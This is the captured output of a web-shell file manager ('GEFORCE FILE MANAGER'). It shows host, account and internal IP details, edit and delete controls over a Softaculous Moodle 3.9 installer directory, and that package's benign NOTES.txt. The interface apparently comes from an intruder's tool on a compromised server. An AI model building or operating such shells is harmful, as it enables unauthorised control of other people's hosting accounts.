[ SYSTEM ]: Linux box5478.bluehost.com 5.14.0-687.15.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jun 11 08:51:45 EDT 2026 x86_64
[ SERVER ]: Apache | PHP: 8.3.32
[ USER ]: citypros | IP: 10.36.205.101
GEFORCE FILE MANAGER
/
var
/
softaculous
/
moodle39
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 images
SET
[ DEL ]
📁 languages
SET
[ DEL ]
📁 php53
SET
[ DEL ]
📁 php56
SET
[ DEL ]
📁 php71
SET
[ DEL ]
📁 php81
SET
[ DEL ]
📁 php82
SET
[ DEL ]
📄 NOTES.txt
1,813 B
SET
[ EDIT ]
|
[ DEL ]
📄 add_admin.php
733 B
SET
[ EDIT ]
|
[ DEL ]
📄 check_utf8.php
6,019 B
SET
[ EDIT ]
|
[ DEL ]
📄 clone.php
5,608 B
SET
[ EDIT ]
|
[ DEL ]
📄 config.php
745 B
SET
[ EDIT ]
|
[ DEL ]
📄 edit.php
4,712 B
SET
[ EDIT ]
|
[ DEL ]
📄 edit.xml
433 B
SET
[ EDIT ]
|
[ DEL ]
📄 extend.php
12,736 B
SET
[ EDIT ]
|
[ DEL ]
📄 fileindex.php
998 B
SET
[ EDIT ]
|
[ DEL ]
📄 import.php
7,699 B
SET
[ EDIT ]
|
[ DEL ]
📄 info.xml
3,512 B
SET
[ EDIT ]
|
[ DEL ]
📄 install.js
924 B
SET
[ EDIT ]
|
[ DEL ]
📄 install.php
10,994 B
SET
[ EDIT ]
|
[ DEL ]
📄 install.xml
2,636 B
SET
[ EDIT ]
|
[ DEL ]
📄 md5
5,062 B
SET
[ EDIT ]
|
[ DEL ]
📄 privatekey.php
786 B
SET
[ EDIT ]
|
[ DEL ]
📄 update_pass.php
541 B
SET
[ EDIT ]
|
[ DEL ]
📄 upgrade.php
8,927 B
SET
[ EDIT ]
|
[ DEL ]
📄 upgrade.xml
307 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: NOTES.txt
* Do not download Weekly Built. 1) Empty the cache, sessions, muc, lock and localcache folders in data.zip 2) Use "defaultcity" for city while installing, country United States and Timezone America/New_york. Also in New settings - Location settings keep America/New_york 3) Download the Language packs here: http://download.moodle.org/langpack/ 4) Unpack the packages in the /languages/[[language]].zip 5) Change the language [[language]] in SQL config and users table. 6) Check this function and if new file is added update it in upgrade.php: upgrade_stale_php_files_present() in the file : /lib/upgradelib.php 7) required minimum version check for upgrade in info.xml should be changed in case of major version change 8) We do not change $CFG->directorypermissions = 0777; in the config file because it is outside the web-accessible directory and does not matter if it is 0777 9) Check if /muc/config.php file is created in data folder on non suPHP server i.e. (you can use Webuzo). 10) `allversionshash` in config table is same for every install 11) `assignfeedback_editpdf` has the value '/usr/bin/gs' on Windows as well as Linux Manual install hence we leave it as it is. 12) PHP REQUIREMENT LINK: https://docs.moodle.org/dev/Moodle_3.9_release_notes#Server_requirements 13) While installing check utf8mb4 collation. To check utfmb4 support, we have referred moodle\lib\dml\mysqli_native_moodle_database.php file. 14) Install manually with keeping database charset to "utf8mb4 general ci" 15) check this file /lib/dml/mysqli_native_moodle_database.php and mariadb_native_moodle_database.php for utf8 collation detection. 16) [IMP] Keep the .git and .gitignore files in fileindex.php as it is required to fetch the installations which are explicitely installed using git. (Requested by Softaculous core team )